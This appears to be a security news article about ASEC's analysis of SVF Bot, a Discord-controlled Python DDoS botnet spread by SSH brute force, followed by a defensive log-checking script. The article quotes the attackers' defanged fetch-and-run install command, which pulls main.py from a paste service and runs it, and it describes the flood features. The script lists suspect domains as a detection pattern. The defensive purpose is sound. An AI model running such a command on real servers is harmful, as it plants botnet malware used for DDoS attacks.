Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) have identified a sophisticated campaign targeting poorly secured Linux servers through SSH brute force attacks, deploying a Python-based DDoS botnet called SVF Bot that leverages Discord as its command-and-control infrastructure.
The SVF Botnet represents a concerning evolution in DDoS attack methodology, utilizing legitimate platforms to evade detection.
Developed by the self-identified “SVF Team,” the malware is distributed as Python source code and establishes communication with threat actors through Discord servers using bot tokens for authentication.
Upon successful SSH compromise, attackers deploy the malware with an installation command that creates a Python virtual environment, installs the required dependencies, fetches the bot source from a paste service and runs it:

python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5
The malware’s architecture includes a server grouping mechanism, allowing threat actors to organize infected machines into clusters for coordinated attacks.
When executed, SVF Bot sends server identification information via Discord webhooks, enabling operators to manage multiple compromised systems simultaneously.
SVF Bot’s technical sophistication extends to its DDoS attack capabilities, supporting both Layer 4 UDP floods and Layer 7 HTTP floods with advanced evasion techniques.
The malware includes comprehensive command functionality, with $http, $customhttp, $udp, and $customudp commands covering the different attack vectors.
A particularly notable feature is the malware’s proxy integration system. Before launching HTTP flood attacks, SVF Bot scrapes proxy addresses from ten public sources, including sslproxies.org, free-proxy-list.net, and multiple GitHub repositories containing proxy lists.
The malware validates each proxy by attempting Google authentication before incorporating them into its attack infrastructure.
This proxy validation process ensures high-quality anonymization during attacks, making detection and attribution significantly more challenging for defenders.
During HTTP flood operations, the malware randomly selects validated proxies for each connection attempt, effectively distributing attack traffic across multiple IP addresses.
The SVF Botnet campaign highlights critical security gaps in Linux server management practices.
ASEC researchers emphasize that organizations must implement robust SSH security measures, including complex passwords, regular credential rotation, and system patching protocols.
Network administrators should deploy comprehensive firewall solutions to restrict unauthorized external access and maintain updated security software.
The malware’s exploitation of legitimate platforms, such as Discord, and public proxy services demonstrates the evolving sophistication of modern botnet operations, necessitating enhanced monitoring capabilities to detect anomalous network behavior patterns and unauthorized outbound connections to messaging platforms.
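The two detection opportunities this write-up points to, a password-guessing burst that ends in an accepted login and, shortly after, outbound connections to the paste service, Discord and the proxy-list sites, can be checked from logs. The following is an added example, not code from ASEC or the SVF Bot source: it runs over constructed sshd log lines and constructed outbound-connection records; the Discord and GitHub raw-content hostnames are assumptions, the other domains come from the write-up.

```python
import re
from collections import Counter, defaultdict

# Constructed sshd log sample (not real data): a failed-password burst followed by a success.
AUTH_LOG = """\
Sep 10 02:11:01 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 40122 ssh2
Sep 10 02:11:03 web1 sshd[2203]: Failed password for root from 203.0.113.7 port 40130 ssh2
Sep 10 02:11:05 web1 sshd[2205]: Failed password for admin from 203.0.113.7 port 40138 ssh2
Sep 10 02:11:08 web1 sshd[2207]: Failed password for root from 203.0.113.7 port 40144 ssh2
Sep 10 02:11:10 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 40150 ssh2
Sep 10 02:11:12 web1 sshd[2211]: Accepted password for root from 203.0.113.7 port 40156 ssh2
Sep 10 02:12:00 web1 sshd[2300]: Accepted publickey for deploy from 198.51.100.20 port 51000 ssh2
"""

# Constructed outbound-connection records (host, destination name), e.g. from DNS or proxy logs.
OUTBOUND = [
    ("web1", "termbin.com"),
    ("web1", "gateway.discord.gg"),
    ("web1", "www.sslproxies.org"),
    ("web1", "free-proxy-list.net"),
    ("web1", "raw.githubusercontent.com"),
    ("db1", "deb.debian.org"),
]

# Domains tied to the delivery, C2 and proxy-scraping chain described above.
# discord.com / discord.gg and githubusercontent.com are assumed endpoints, not named in the write-up.
SUSPECT_DOMAINS = {"termbin.com", "discord.com", "discord.gg", "sslproxies.org",
                   "free-proxy-list.net", "githubusercontent.com"}

FAILED = re.compile(r"Failed password for (\S+) from (\S+) port")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+) port")

def find_bruteforce_logins(log, threshold=5):
    """Return {source_ip: user} for password logins accepted after >= threshold failures from that IP."""
    failures = Counter()
    hits = {}
    for line in log.splitlines():
        m = FAILED.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED.search(line)
        if m and failures[m.group(2)] >= threshold:
            hits[m.group(2)] = m.group(1)
    return hits

def find_suspect_outbound(records):
    """Return {host: sorted destinations} that match a suspect domain or one of its subdomains."""
    found = defaultdict(set)
    for host, dest in records:
        if any(dest == d or dest.endswith("." + d) for d in SUSPECT_DOMAINS):
            found[host].add(dest)
    return {h: sorted(d) for h, d in found.items()}
```

A host that appears in both results within a short window matches the compromise chain described above far more strongly than either signal alone.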